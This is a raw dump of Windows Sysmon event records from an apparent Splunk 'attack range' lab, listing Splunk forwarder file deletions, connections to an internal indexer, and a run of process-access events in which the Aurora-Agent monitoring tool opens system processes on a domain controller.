AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19D30A099610EAC09478F08D8F3BED1F,SHA256=DB6CB93DF50E2697FE4A7784C2DC6FF9856FC24C238CBF3783015FF155A91796,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018168Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:04.062{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50167-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 354300x800000000000000018167Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:03.928{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50166-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018166Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:05.792{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5F807D0EA8B85EEB9A71D8D51494D4A,SHA256=9413973A2B98DD8853E4B9C489A0A3B839BB12BB6C11C9DB57F366DA19A545D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:06.841{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0231FB2723786CA902F792B0F3DEB75B,SHA256=A77326A632D061105F333B1765F3B2D7F4857D6FF65CDEDC30BE3D51BBEE870F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018169Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:06.877{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7470AFA915FD2FE4C09B22E9A1A109E,SHA256=D37D0DE4B7A7BA1D119DA6C0D6A380C268FD5B1C61395F74C90CFADD363977D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:03.547{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56440-false10.0.1.12-8000- 23542300x800000000000000018170Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:07.968{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E71AA05AD7A002CA22E51ADB08D7FD69,SHA256=D8A54C1CD78648A5C6DC841DF539306BA8412AB079C5513CC712F9BB131E49AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:07.926{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D57045DADA25E282F10CBAD5D190388,SHA256=32F169358777A30C58416C65D17A3745AE13C5990D2E57708AE72C34FD1F54AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018171Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:09.060{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCD5790124EA0112B240939018437FE8,SHA256=C1911C0E0EDF30ACAE0AD6B4B8C221FBC53C774315391580299A365FA14EDD16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:09.030{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CB8DB51D6417ED774291D45BB178EB1,SHA256=717875A95CC2EEA2EB62BF99D0873ECFF3D060EDCFE9BC4FC66623F677F2D37E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018172Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:10.141{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F65E7C57FA838B3D4A2781E358B3C26,SHA256=7E5C9FBA530DF65DE132309F4760220AE7BD8D6B8E73164D51F9C7DD1288866E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:08.691{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56441-false10.0.1.12-8000- 23542300x800000000000000045791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:10.102{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3251339385D99A7EBB5FF3827AA7C21E,SHA256=0F92D577133956DA10862C24582C46BB9E44F66E2000AD607A32650976090835,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018173Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:11.230{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530D0E47BDB9281BE177EF57D83CADD7,SHA256=FE363C4AAD4CDB327BDCF9175814603046DAA22438B5FA776BC05BC81AD9DBD2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.919{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.917{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.912{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.911{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.879{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.805{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.746{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 